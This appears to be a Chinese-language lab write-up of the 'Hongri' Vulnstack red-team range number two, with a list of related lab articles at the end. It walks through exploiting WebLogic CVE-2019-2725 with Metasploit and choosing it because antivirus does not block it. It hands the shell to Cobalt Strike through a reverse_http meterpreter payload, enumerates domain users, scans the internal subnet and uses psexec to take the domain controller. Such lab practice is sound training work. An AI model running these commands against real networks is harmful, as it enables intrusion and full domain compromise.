一、所需環境
web端(雙網路卡)pc主機(雙網路卡)dc
web端開啟weblogic服務,360安全衛士
二、資訊收集
1、目標主機探測
2、埠掃描
發現開啟了許多高危埠,比如:7001、3389、445等
3、對7001weblogic埠就行漏洞掃描--->工具(Vscan-plus)
發現掃出了一些cve漏洞,然後逐個嘗試
三、打點
1、訪問weblogic頁面
沒啥東西接著就是對該服務的漏洞利用了
2、使用msf就行漏洞利用
經過多次嘗試覺得使用cve-2019-2725漏洞可以成功使用,而且不會被殺軟攔截
發現已經成功獲得了對方的shell,檢視了一下許可權,發現是administrator還行,使用getsystem提權失敗,則想著將對方的防火牆關閉掉,一邊後續的滲透操作
接著就是檢視一下目標機器的IP資訊
發現還有一個內網地址,然後接著使用systeminfo看一下目標主機打了那些補丁
然後還發現了域 de1ay.com
四、內網滲透
1、msf委派cs上線
use exploit/windows/local/payload_inject
set session 1
set lport 5757
set DisablePayloadHandler true
set payload windows/meterpreter/reverse_http
cs配置監聽模組
成功委派上線
2、爬取域管的賬戶密碼
確定域管理員
shell net user /domain
發現此處不能直接檢視,要在域控內才行,接著就是對其餘的主機就行橫向滲透
3、內網埠掃描
portscan 10.10.10.0/24 1-1024,3389,5000-6000 arp 1024
發現了兩個主機一個是pc,另一個是dc,然後就是透過使用psexec,使用域管理員賬戶登陸dc
發現dc已成功拿下,pc同理
橫向滲透完成
紅日靶場二
相關文章
- 紅日靶場1
- 紅日靶場01
- VulnStack-紅日靶機二
- 紅日靶場(內網滲透)——2內網
- 紅日靶機(三)筆記筆記
- 紅日靶機(一) 筆記筆記
- 紅日靶機(七)筆記筆記
- 紅隊實戰靶場ATT&CK(二)
- joker靶場
- Hat靶場
- 【靶場實戰】vulntarget-b漏洞靶場實戰
- dvwa靶場搭建
- pikachu靶場搭建
- pick靶場-sql注入SQL
- API安全靶場crAPIAPI
- UploadLabs靶場
- vulnhub--JIS靶場
- 賽寧談靶場–面向實戰的網路靶場體系
- Vulnstack內網靶場4內網
- Vulnstack內網靶場3內網
- Vulnstack內網靶場2內網
- vulnhub靶場之HACKSUDO: PROXIMACENTAURIMac
- 360眾測靶場考核
- CSRF(Pikachu靶場練習)
- DVWA靶場通關教程
- VulnHub靶場學習_HA: Chakravyuh
- Web For Pentester靶場(xss部分)Web
- 【Vulnhub靶場】DRIPPING BLUES: 1
- Vulnhub----bulldog靶場筆記筆記
- vulnhub靶場之CONTAINME: 1AI
- vulnhub靶場之CROSSROADS: 1ROS
- vulnhub靶場之ADROIT: 1.0.1
- DC1靶場練習
- bp靶場業務邏輯漏洞
- Web 靶場筆記-bWAPPWeb筆記APP
- vulnstack1靶場學習
- VulnHub 實戰靶場Breach-1.0
- 靶場專案編寫實戰